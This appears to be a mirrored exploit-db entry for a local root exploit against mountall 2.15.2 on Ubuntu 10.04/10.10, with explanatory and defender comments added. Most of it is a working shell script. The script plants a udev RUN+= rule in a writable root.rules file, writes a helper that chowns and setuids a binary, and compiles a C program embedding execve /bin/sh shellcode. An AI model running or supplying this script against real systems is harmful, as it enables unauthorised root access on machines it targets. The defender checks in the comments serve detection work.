mountall 2.15.2 (Ubuntu 10.04/10.10) – Local Privilege Escalation

  • 作者: fuzz
    日期: 2010-09-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15074/
  • # source: https://www.securityfocus.com/bid/43084/info
    
    #!/bin/sh
    # by fuzz. For Anux inc. #
    # ubuntu 10.04 , 10.10
    #
    # Overview: the script plants a udev rule whose RUN+= action points at a
    # helper script. Once udev reloads its rules and a matching device event
    # fires, udev starts the helper with its own privileges (root), and the
    # helper turns a locally compiled binary into a setuid-root executable.
    #
    # Root cause as far as this page shows: the append to
    # /dev/.udev/rules.d/root.rules below is expected to succeed for an
    # unprivileged caller, i.e. that file is writable by non-root users on
    # affected systems (page title: mountall 2.15.2, Ubuntu 10.04/10.10).
    # NOTE(review): the "usn985" file names presumably refer to the Ubuntu
    # Security Notice that carries the fix - confirm against the advisory.
    #
    # Defender checks: root.rules should be owned by root and not writable by
    # group or other; a RUN+= entry in it that points into a home or temporary
    # directory is a strong indicator of tampering; audit for unexpected
    # setuid-root files outside system paths.

    # Require the udev KERNEL match string as the first argument; otherwise
    # print usage and exit (bare `exit` returns the status of the last echo).
    if [ -z "$1" ]
    then
    echo "usage: $0 <UDEV KERNEL EVENT>"
    echo "see here http://www.reactivated.net/writing_udev_rules.html"
    exit
    fi
    # Write the helper that the udev rule will reference. The heredoc delimiter
    # is unquoted, so $PWD is expanded now and the generated file contains
    # absolute paths to usn985-sc in the current directory.
    cat > usn985-exploit.sh << EOF
    #!/bin/sh
    chown root:root $PWD/usn985-sc
    chmod +s $PWD/usn985-sc
    EOF
    # Write a small C program. The byte string appears to decode to 32-bit x86
    # Linux code that invokes execve on /bin//sh (syscall 0x0b via int 0x80).
    # main() stores the string's address two ints above the local r -
    # presumably the saved return address, which depends on compiler and stack
    # layout - so control would transfer to the bytes when main returns.
    # NOTE(review): the bytes live in a data section; non-executable data pages
    # would be expected to stop this payload as written - confirm per target.
    cat > usn985-sc.c << EOF
    char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
    "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
    main(){int *r;*((int *)&r+2)=(int)s;}
    EOF
    # Build the binary as the current user; at this point it is an ordinary,
    # unprivileged executable.
    gcc usn985-sc.c -o usn985-sc
    # Append the rule; $1 is inserted verbatim as the KERNEL== match. This is
    # the only step that depends on root.rules being writable by the caller.
    # Where it is not, the redirection fails and no rule is installed (the
    # script has no error check, so the final messages are still printed).
    echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
    # The helper needs the execute bit before a RUN+= action can start it.
    chmod +x usn985-exploit.sh
    # Nothing has been escalated yet: the rule only takes effect after udev
    # reloads its rules and an event matching the KERNEL== pattern occurs.
    echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
    echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"